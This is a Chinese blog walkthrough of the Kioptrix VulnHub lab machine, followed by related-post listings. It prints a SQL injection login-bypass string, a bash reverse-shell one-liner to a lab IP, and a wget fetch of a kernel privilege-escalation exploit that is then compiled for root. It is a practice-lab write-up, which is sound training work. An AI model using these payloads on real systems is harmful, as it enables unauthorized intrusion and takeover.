Vunlnhub之Kioptrix渗透实战

最新推荐文章于 2025-05-15 13:54:08 发布
原创 最新推荐文章于 2025-05-15 13:54:08 发布 · 498 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#vulnhub #Kioptrix

Kioptrix渗透实战

1、环境简介
难度:简单
网络:桥接自动分配IP地址

2、主机发现

   nmap -sP 192.168.34.0/24

3、漏洞发现
访问主页面,是一个登录界面,尝试使用万能用户名登录
在这里插入图片描述

1' or 1=1#

4、命令执行,反弹shell
返回一个框,ping目标主机,存在命令注入漏洞

在这里插入图片描述
kali监听,bash反弹shell

bash -i >& /dev/tcp/192.168.34.179/8888 0>&1

在这里插入图片描述

5、提权
查看内核版本,使用exp提权
在这里插入图片描述
确定内核版本后,尝试好几次,最后确定为9524.c
在这里插入图片描述
打开kali服务器(或者搭建建议服务器)

wget http://192.168.34.179:8888/9524.c

进行编译并运行

bash-3.00$ gcc -o 1 9524.c
bash-3.00$ ./1

获取root权限,并查看flag文件

网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5815
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 1026
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
逻辑漏洞-客户端验证的邮箱-Web渗透实例之中国教育部青少年普法网站逻辑漏洞...
aiquan9342的博客
03-27 803
转载自:http://www.zmnhssn.com/?post=61 漏洞地址:https://user.qspfw.com 用户登陆界面 具体漏洞地址: 用户密码找回界面:https://user.qspfw.com/page/user/findpwd/forget_pwd.do 这里可以确认网站有没有这个用户,这个用户也是在其他页面找的,貌似还是个妹子。 然后...
OSCP备战-kioptrix 2014详细步骤
最新发布
2301_81864699的博客
05-15 401
移除网卡,重新添加(否则探测不了Ip的)
某网站(JSP + Access) 渗透 实例 ( eWebEditor 漏洞 )
Knove的博客
04-15 3355
某网站后台是用的   蓝滨新闻系统精简加强版 即如图:可见,后台是JSP + Access,虽然这个新闻系统标题写了是安全性加强版本,但是对于这种系统我还是很感兴趣的。根据这个系统的源代码,找这个系统的漏洞。manage/htmledit/eWebEditor.asp sSql = "select * from ewebeditor_style where s_name='" & sSty...
实战案例】——实战渗透某不法网站
热门推荐
Demo不是emo的博客
11-21 3万+
新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
渗透实战:内网域渗透_内网渗透实例
Spontaneous_0的博客
10-07 1219
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
一次对在线挂机网站的渗透的例子
jahn的专栏
10-16 1158
网页跑的是iis的.说不定能注入.结果是预料之中的.注入漏洞不存在. 既然网页没漏洞的话.系统漏洞存在的可能性就微乎其微了,我还是去别处看看好了.随便转了下.跑到登录的界面,居然有个测试,嘿嘿.有机会了. 登录后发现其实所谓的远程挂机平台,在线挂机什么的只是个网页版的远程终端而已.这下有好戏看了.哇哈哈`` 道理很简单,既然我们能上终端服务器,那么我们肯定有一定的权限,我们
网站综合渗透及实例演示一.zip
weixin_33937499的博客
07-12 128
网站综合渗透及实例演示一.zip 点击进入高速下载通道 转载于:https://www.cnblogs.com/gwrjy/p/7157653.html
记一次对某网站的简单渗透
weixin_44695144的博客
06-11 863
事情是这样的,下午闲来无事,由于最近学习了逻辑支付漏洞,就想着挖一下。随后我便打开了某网站;在尝试了多次无果后,我将注意力放到了路径上,之后有趣的事情发生了。 他起初的路径是这样的 看到这个路径总想做点什么,看他会不会有目录遍历的漏洞。随后在clientarea.php后面添加了./和…/分别进行测试。 观察页面刷新一下还是当前页面。继续输入 …/继续测试 发现页面跳转到clientarea.php的上级目录/whmcs下 基本确认存在目录遍漏洞,为了再次确认一下,又继续在后面添加…/…/的路径。
VunlnHub—CTF4
qq_45434762的博客
05-21 536
主机发现使用nmap扫描网段,寻找靶机IP地址sudo nmap 192.168.169.1/24 靶机的IP是192.168.169.143端口探测使用nmap进一步探测目标主机开放的...
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1740
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
VnlnHub pyexpvm
weixin_45682839的博客
10-21 717
涉及知识:端口服务探测、密码爆破、mysql提权、加解密、linux本地提权
Vunlnhub:靶机DC-9渗透详解
m0_65712192的博客
03-06 1478
Vunlnhub:靶机DC-9渗透详解
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 563
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 1万+
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Kioptrix 5 渗透流程
braty_的博客
01-02 1207
可以看到操作系统为FreeBSD 9.0,存在root权限用户root和toor,普通用户ossec,ossecm和ossecr。使用搜索引擎搜索FreeBSD系统Apache的配置文件路径,得到默认配置文件路径为:/usr/local/etc/apache22/httpd.conf。最后面可以看到访问8080端口的agent是 Mozilla/4.0 Mozilla4_browser。发现对应的脚本,版本一致,是个路径穿越漏洞。我们利用 burp suite 抓包修改。kali和靶机都是nat的网卡。
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 432
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值